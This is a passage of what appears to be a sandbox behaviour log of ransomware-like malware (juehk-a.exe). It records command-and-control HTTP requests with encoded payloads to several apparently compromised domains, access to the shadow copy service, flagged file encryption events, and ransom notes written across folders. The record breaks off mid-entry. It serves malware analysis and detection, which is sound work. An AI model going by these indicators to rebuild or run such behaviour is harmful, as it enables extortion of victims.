5613.          sequenceNumber: 431
5614.          desiredaccess: 0x02000030
5615.          ntstatus: 0xc0000022
5616.          target:
5617.            processinfo:
5618.              pid: 4
5619.              tid: 0
5620.              imagepath: N/A
5621.          source:
5622.            processinfo:
5623.              pid: 1648
5624.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5625.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5626.        process:
5627.          timestamp: 44302
5628.          mode: opened
5629.          sequenceNumber: 432
5630.          desiredaccess: 0x02000030
5631.          ntstatus: 0xc0000022
5632.          target:
5633.            processinfo:
5634.              pid: 384
5635.              tid: 0
5636.              imagepath: N/A
5637.          source:
5638.            processinfo:
5639.              pid: 1648
5640.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5641.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5642.        process:
5643.          timestamp: 44306
5644.          mode: opened
5645.          sequenceNumber: 433
5646.          desiredaccess: 0x02000030
5647.          ntstatus: 0x00000000
5648.          target:
5649.            processinfo:
5650.              pid: 3012
5651.              imagepath: C:\Windows\System32\dllhost.exe
5652.              md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
5653.          source:
5654.            processinfo:
5655.              pid: 1648
5656.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5657.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5658.        network:
5659.          timestamp: 44333
5660.          mode: http_request
5661.          sequenceNumber: 434
5662.          processinfo:
5663.            tainted: true
5664.            pid: 1648
5665.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5666.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5667.          protocol_type: tcp
5668.          destination_port: 80
5669.          ipaddress: 199.16.199.2
5670.          http_request: GET /raw HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: myexternalip.com~~~~
5671.        process:
5672.          timestamp: 44386
5673.          mode: opened
5674.          sequenceNumber: 435
5675.          desiredaccess: 0x02000030
5676.          ntstatus: 0x00000000
5677.          target:
5678.            processinfo:
5679.              pid: 3012
5680.              imagepath: C:\Windows\System32\dllhost.exe
5681.              md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
5682.          source:
5683.            processinfo:
5684.              pid: 1648
5685.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5686.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5687.        apicall:
5688.          timestamp: 44392
5689.          repeat: 40
5690.          sequenceNumber: 436
5691.          processinfo:
5692.            pid: 1648
5693.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5694.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5695.          dllname: kernel32.dll
5696.          apiname: Sleep
5697.          address: 0x7760d98d
5698.        process:
5699.          timestamp: 44641
5700.          mode: opened
5701.          sequenceNumber: 437
5702.          desiredaccess: 0x02000030
5703.          ntstatus: 0x00000000
5704.          target:
5705.            processinfo:
5706.              pid: 3012
5707.              imagepath: C:\Windows\System32\dllhost.exe
5708.              md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
5709.          source:
5710.            processinfo:
5711.              pid: 1648
5712.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5713.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5714.        process:
5715.          timestamp: 44646
5716.          mode: opened
5717.          sequenceNumber: 438
5718.          desiredaccess: 0x02000030
5719.          ntstatus: 0x00000000
5720.          target:
5721.            processinfo:
5722.              pid: 2436
5723.              imagepath: C:\Windows\System32\VSSVC.exe
5724.              md5sum: b60ba0bc31b0cb414593e169f6f21cc2
5725.          source:
5726.            processinfo:
5727.              pid: 1648
5728.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5729.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5730.        network:
5731.          timestamp: 44652
5732.          mode: dns_query
5733.          sequenceNumber: 439
5734.          processinfo:
5735.            tainted: true
5736.            pid: 1648
5737.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5738.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5739.          protocol_type: udp
5740.          qtype: Host Address
5741.          hostname: irseek.com
5742.        network:
5743.          timestamp: 44656
5744.          mode: dns_query_answer
5745.          sequenceNumber: 440
5746.          processinfo:
5747.            tainted: true
5748.            pid: 1648
5749.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5751.          protocol_type: udp
5752.          dns_response_code: 0
5753.          hostname: irseek.com
5754.          answer_number: 1
5755.          ipaddress: 199.16.199.3
5756.        network:
5757.          timestamp: 44662
5758.          mode: http_request
5759.          sequenceNumber: 441
5760.          processinfo:
5761.            tainted: true
5762.            pid: 1648
5763.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5764.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5765.          protocol_type: tcp
5766.          destination_port: 80
5767.          ipaddress: 199.16.199.3
5768.          http_request: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: irseek.com~~Connection: Keep-Alive~~~~
5769.        network:
5770.          timestamp: 44673
5771.          mode: dns_query
5772.          sequenceNumber: 442
5773.          processinfo:
5774.            tainted: true
5775.            pid: 1648
5776.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5777.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5778.          protocol_type: udp
5779.          qtype: Host Address
5780.          hostname: djepola.com
5781.        network:
5782.          timestamp: 44676
5783.          mode: dns_query_answer
5784.          sequenceNumber: 443
5785.          processinfo:
5786.            tainted: true
5787.            pid: 1648
5788.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5789.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5790.          protocol_type: udp
5791.          dns_response_code: 0
5792.          hostname: djepola.com
5793.          answer_number: 1
5794.          ipaddress: 199.16.199.4
5795.        network:
5796.          timestamp: 44682
5797.          mode: http_request
5798.          sequenceNumber: 444
5799.          processinfo:
5800.            tainted: true
5801.            pid: 1648
5802.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5803.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5804.          protocol_type: tcp
5805.          destination_port: 80
5806.          ipaddress: 199.16.199.4
5807.          http_request: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECCCDF4ACE08BDF5C7289F82EA3EB2B2634532A4222EE1D3499322BCAEB7C18FDFE52473350D84D471C408DB88DA2A6314 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: djepola.com~~Connection: Keep-Alive~~~~
5808.        Ransom:
5809.          timestamp: 44692
5810.          sequenceNumber: 445
5811.          pattern: MC
5812.          value: C:\34aSjIoCE1\_GKbRFl.png
5813.          md5sum: 247fc27abde7c110498a6b91c59362f1
5814.        network:
5815.          timestamp: 44726
5816.          mode: dns_query
5817.          sequenceNumber: 446
5818.          processinfo:
5819.            tainted: true
5820.            pid: 1648
5821.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5822.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5823.          protocol_type: udp
5824.          qtype: Host Address
5825.          hostname: aprenderabailarsevillanas.com
5826.        network:
5827.          timestamp: 44730
5828.          mode: dns_query_answer
5829.          sequenceNumber: 447
5830.          processinfo:
5831.            tainted: true
5832.            pid: 1648
5833.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5834.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5835.          protocol_type: udp
5836.          dns_response_code: 0
5837.          hostname: aprenderabailarsevillanas.com
5838.          answer_number: 1
5839.          ipaddress: 199.16.199.5
5840.        file:
5841.          timestamp: 44734
5842.          mode: created
5843.          sequenceNumber: 448
5844.          value: C:\34aSjIoCE1\how_recover+deg.txt
5845.          processinfo:
5846.            pid: 1648
5847.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5848.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5849.            ads:
5850.          fid (ads:): 562949953520987
5851.          ntstatus: 0x0
5852.          CreateOptions: 0x60
5853.        file:
5854.          timestamp: 44738
5855.          mode: close
5856.          sequenceNumber: 449
5857.          value: C:\34aSjIoCE1\how_recover+deg.txt
5858.          filesize: 2673
5859.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
5860.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
5861.          processinfo:
5862.            pid: 1648
5863.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5864.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5865.            ads:
5866.          fid (ads:): 562949953520987
5867.          ntstatus: 0x0
5868.          CreateOptions: 0x0
5869.        process:
5870.          timestamp: 44743
5871.          mode: opened
5872.          sequenceNumber: 450
5873.          desiredaccess: 0x02000030
5874.          ntstatus: 0x00000000
5875.          target:
5876.            processinfo:
5877.              pid: 2436
5878.              imagepath: C:\Windows\System32\VSSVC.exe
5879.              md5sum: b60ba0bc31b0cb414593e169f6f21cc2
5880.          source:
5881.            processinfo:
5882.              pid: 1648
5883.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5884.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5885.        network:
5886.          timestamp: 44751
5887.          mode: http_request
5888.          sequenceNumber: 451
5889.          processinfo:
5890.            tainted: true
5891.            pid: 1648
5892.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5893.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5894.          protocol_type: tcp
5895.          destination_port: 80
5896.          ipaddress: 199.16.199.5
5897.          http_request: GET /wp-content/uploads/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC581871DC2741952E277C0C5C394EA73D62FFDF06CAA95F626F02DD304DE50A8B24A5036A0F943613122485EC8199077B32C438EEC4196B005AED3B2E21F64BA5 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
5898.        file:
5899.          timestamp: 44762
5900.          mode: created
5901.          sequenceNumber: 452
5902.          value: C:\34aSjIoCE1\how_recover+deg.html
5903.          processinfo:
5904.            pid: 1648
5905.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5906.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5907.            ads:
5908.          fid (ads:): 562949953520988
5909.          ntstatus: 0x0
5910.          CreateOptions: 0x60
5911.        file:
5912.          timestamp: 44765
5913.          mode: close
5914.          sequenceNumber: 453
5915.          value: C:\34aSjIoCE1\how_recover+deg.html
5916.          filesize: 9480
5917.          md5sum: a68c3caf0be8f1a393c697136926cfd4
5918.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
5919.          processinfo:
5920.            pid: 1648
5921.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5922.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5923.            ads:
5924.          fid (ads:): 562949953520988
5925.          ntstatus: 0x0
5926.          CreateOptions: 0x0
5927.        network:
5928.          timestamp: 44771
5929.          mode: dns_query
5930.          sequenceNumber: 454
5931.          processinfo:
5932.            tainted: true
5933.            pid: 1648
5934.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5936.          protocol_type: udp
5937.          qtype: Host Address
5938.          hostname: apotheke-stiepel.com
5939.        network:
5940.          timestamp: 44775
5941.          mode: dns_query_answer
5942.          sequenceNumber: 455
5943.          processinfo:
5944.            tainted: true
5945.            pid: 1648
5946.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5947.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5948.          protocol_type: udp
5949.          dns_response_code: 0
5950.          hostname: apotheke-stiepel.com
5951.          answer_number: 1
5952.          ipaddress: 199.16.199.6
5953.        network:
5954.          timestamp: 44780
5955.          mode: http_request
5956.          sequenceNumber: 456
5957.          processinfo:
5958.            tainted: true
5959.            pid: 1648
5960.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5962.          protocol_type: tcp
5963.          destination_port: 80
5964.          ipaddress: 199.16.199.6
5965.          http_request: GET /tmp/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECED21659CCF7FD986FA06F839218E7B26671AEA59CDB3DD9E39D2FBB34FC011E1FE479B2804682BF57FEE5D1570CA74FAFCF9F145EF08CF920BFFF611B7A33C72 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: apotheke-stiepel.com~~Connection: Keep-Alive~~~~
5966.        network:
5967.          timestamp: 44792
5968.          mode: dns_query
5969.          sequenceNumber: 457
5970.          processinfo:
5971.            tainted: true
5972.            pid: 1648
5973.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5974.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5975.          protocol_type: udp
5976.          qtype: Host Address
5977.          hostname: woodenden.com
5978.        network:
5979.          timestamp: 44795
5980.          mode: dns_query_answer
5981.          sequenceNumber: 458
5982.          processinfo:
5983.            tainted: true
5984.            pid: 1648
5985.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5986.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5987.          protocol_type: udp
5988.          dns_response_code: 0
5989.          hostname: woodenden.com
5990.          answer_number: 1
5991.          ipaddress: 199.16.199.7
5992.        network:
5993.          timestamp: 44812
5994.          mode: http_request
5995.          sequenceNumber: 459
5996.          processinfo:
5997.            tainted: true
5998.            pid: 1648
5999.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
6000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6001.          protocol_type: tcp
6002.          destination_port: 80
6003.          ipaddress: 199.16.199.7
6004.          http_request: GET /sysmisc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC8C1F04548850EF19C3EB9D643E09CC58931D23D4D7043ED1E0E5F59FA4F086A6869ABC83F805F0257360B1F8886541C7 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
6005.        process:
6006.          timestamp: 44823
6007.          mode: opened
6008.          sequenceNumber: 460
6009.          desiredaccess: 0x02000030
6010.          ntstatus: 0x00000000
6011.          target:
6012.            processinfo:
6013.              pid: 2436
6014.              imagepath: C:\Windows\System32\VSSVC.exe
6015.              md5sum: b60ba0bc31b0cb414593e169f6f21cc2
6016.          source:
6017.            processinfo:
6018.              pid: 1648
6019.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6020.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6021.        Ransom:
6022.          timestamp: 44845
6023.          sequenceNumber: 461
6024.          pattern: MC
6025.          value: C:\669pqJmraSIS2\-GALpUUacZ.xls
6026.          md5sum: 623549e1a17f1ae27c54ad0fb57df98b
6027.        process:
6028.          timestamp: 44905
6029.          mode: opened
6030.          sequenceNumber: 462
6031.          desiredaccess: 0x02000030
6032.          ntstatus: 0x00000000
6033.          target:
6034.            processinfo:
6035.              pid: 2436
6036.              imagepath: C:\Windows\System32\VSSVC.exe
6037.              md5sum: b60ba0bc31b0cb414593e169f6f21cc2
6038.          source:
6039.            processinfo:
6040.              pid: 1648
6041.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6042.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6043.        Ransom:
6044.          timestamp: 45070
6045.          sequenceNumber: 463
6046.          pattern: MC
6047.          value: C:\669pqJmraSIS2\LmajhJG.jpg
6048.          md5sum: 37b54be2fd7e763fe9260e32165ba9a2
6049.        Ransom:
6050.          timestamp: 45264
6051.          sequenceNumber: 464
6052.          pattern: MC
6053.          value: C:\669pqJmraSIS2\MIQnUKwcYN.doc
6054.          md5sum: 4dc2dc0242822f04f137b1e89c749b51
6055.        apicall:
6056.          timestamp: 45318
6057.          repeat: 50
6058.          sequenceNumber: 465
6059.          processinfo:
6060.            pid: 1648
6061.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6062.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6063.          dllname: kernel32.dll
6064.          apiname: Sleep
6065.          address: 0x0041ed5b
6066.        Ransom:
6067.          timestamp: 45345
6068.          sequenceNumber: 466
6069.          pattern: MC
6070.          value: C:\669pqJmraSIS2\sCIcnQmWp.ppt
6071.          md5sum: a640fb1c98feba21e377df234ca31030
6072.        file:
6073.          timestamp: 45353
6074.          mode: created
6075.          sequenceNumber: 467
6076.          value: C:\669pqJmraSIS2\how_recover+deg.txt
6077.          processinfo:
6078.            pid: 1648
6079.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6080.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6081.            ads:
6082.          fid (ads:): 562949953520989
6083.          ntstatus: 0x0
6084.          CreateOptions: 0x60
6085.        file:
6086.          timestamp: 45358
6087.          mode: close
6088.          sequenceNumber: 468
6089.          value: C:\669pqJmraSIS2\how_recover+deg.txt
6090.          filesize: 2673
6091.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6092.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6093.          processinfo:
6094.            pid: 1648
6095.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6096.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6097.            ads:
6098.          fid (ads:): 562949953520989
6099.          ntstatus: 0x0
6100.          CreateOptions: 0x0
6101.        file:
6102.          timestamp: 45449
6103.          mode: created
6104.          sequenceNumber: 469
6105.          value: C:\669pqJmraSIS2\how_recover+deg.html
6106.          processinfo:
6107.            pid: 1648
6108.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6109.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6110.            ads:
6111.          fid (ads:): 562949953520990
6112.          ntstatus: 0x0
6113.          CreateOptions: 0x60
6114.        file:
6115.          timestamp: 45453
6116.          mode: close
6117.          sequenceNumber: 470
6118.          value: C:\669pqJmraSIS2\how_recover+deg.html
6119.          filesize: 9480
6120.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6121.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6122.          processinfo:
6123.            pid: 1648
6124.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6126.            ads:
6127.          fid (ads:): 562949953520990
6128.          ntstatus: 0x0
6129.          CreateOptions: 0x0
6130.        file:
6131.          timestamp: 45458
6132.          mode: find
6133.          sequenceNumber: 471
6134.          value: C:\Boot\*
6135.          processinfo:
6136.            pid: 1648
6137.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6138.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6139.          ntstatus: 0x0
6140.          CreateOptions: 0x0
6141.        file:
6142.          timestamp: 45461
6143.          mode: find
6144.          sequenceNumber: 472
6145.          value: C:\Boot\cs-CZ\*
6146.          processinfo:
6147.            pid: 1648
6148.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6149.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6150.          ntstatus: 0x0
6151.          CreateOptions: 0x0
6152.        file:
6153.          timestamp: 45464
6154.          mode: created
6155.          sequenceNumber: 473
6156.          value: C:\Boot\cs-CZ\how_recover+deg.txt
6157.          processinfo:
6158.            pid: 1648
6159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6161.            ads:
6162.          fid (ads:): 562949953520991
6163.          ntstatus: 0x0
6164.          CreateOptions: 0x60
6165.        file:
6166.          timestamp: 45468
6167.          mode: close
6168.          sequenceNumber: 474
6169.          value: C:\Boot\cs-CZ\how_recover+deg.txt
6170.          filesize: 2673
6171.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6172.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6173.          processinfo:
6174.            pid: 1648
6175.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6177.            ads:
6178.          fid (ads:): 562949953520991
6179.          ntstatus: 0x0
6180.          CreateOptions: 0x0
6181.        file:
6182.          timestamp: 45494
6183.          mode: created
6184.          sequenceNumber: 475
6185.          value: C:\Boot\cs-CZ\how_recover+deg.html
6186.          processinfo:
6187.            pid: 1648
6188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6190.            ads:
6191.          fid (ads:): 562949953520992
6192.          ntstatus: 0x0
6193.          CreateOptions: 0x60
6194.        file:
6195.          timestamp: 45500
6196.          mode: close
6197.          sequenceNumber: 476
6198.          value: C:\Boot\cs-CZ\how_recover+deg.html
6199.          filesize: 9480
6200.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6201.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6202.          processinfo:
6203.            pid: 1648
6204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6206.            ads:
6207.          fid (ads:): 562949953520992
6208.          ntstatus: 0x0
6209.          CreateOptions: 0x0
6210.        file:
6211.          timestamp: 45551
6212.          mode: find
6213.          sequenceNumber: 477
6214.          value: C:\Boot\da-DK\*
6215.          processinfo:
6216.            pid: 1648
6217.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6218.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6219.          ntstatus: 0x0
6220.          CreateOptions: 0x0
6221.        file:
6222.          timestamp: 45587
6223.          mode: created
6224.          sequenceNumber: 478
6225.          value: C:\Boot\da-DK\how_recover+deg.txt
6226.          processinfo:
6227.            pid: 1648
6228.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6229.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6230.            ads:
6231.          fid (ads:): 562949953520993
6232.          ntstatus: 0x0
6233.          CreateOptions: 0x60
6234.        file:
6235.          timestamp: 45591
6236.          mode: close
6237.          sequenceNumber: 479
6238.          value: C:\Boot\da-DK\how_recover+deg.txt
6239.          filesize: 2673
6240.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6241.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6242.          processinfo:
6243.            pid: 1648
6244.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6246.            ads:
6247.          fid (ads:): 562949953520993
6248.          ntstatus: 0x0
6249.          CreateOptions: 0x0
6250.        file:
6251.          timestamp: 45599
6252.          mode: created
6253.          sequenceNumber: 480
6254.          value: C:\Boot\da-DK\how_recover+deg.html
6255.          processinfo:
6256.            pid: 1648
6257.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6258.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6259.            ads:
6260.          fid (ads:): 562949953520994
6261.          ntstatus: 0x0
6262.          CreateOptions: 0x60
6263.        file:
6264.          timestamp: 45603
6265.          mode: close
6266.          sequenceNumber: 481
6267.          value: C:\Boot\da-DK\how_recover+deg.html
6268.          filesize: 9480
6269.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6270.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6271.          processinfo:
6272.            pid: 1648
6273.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6274.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6275.            ads:
6276.          fid (ads:): 562949953520994
6277.          ntstatus: 0x0
6278.          CreateOptions: 0x0
6279.        file:
6280.          timestamp: 45608
6281.          mode: created
6282.          sequenceNumber: 482
6283.          value: C:\Boot\de-DE\how_recover+deg.txt
6284.          processinfo:
6285.            pid: 1648
6286.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6287.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6288.            ads:
6289.          fid (ads:): 562949953520995
6290.          ntstatus: 0x0
6291.          CreateOptions: 0x60
6292.        file:
6293.          timestamp: 45612
6294.          mode: close
6295.          sequenceNumber: 483
6296.          value: C:\Boot\de-DE\how_recover+deg.txt
6297.          filesize: 2673
6298.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6299.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6300.          processinfo:
6301.            pid: 1648
6302.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6303.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6304.            ads:
6305.          fid (ads:): 562949953520995
6306.          ntstatus: 0x0
6307.          CreateOptions: 0x0
6308.        apicall:
6309.          timestamp: 45805
6310.          repeat: 60
6311.          sequenceNumber: 484
6312.          processinfo:
6313.            pid: 1648
6314.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
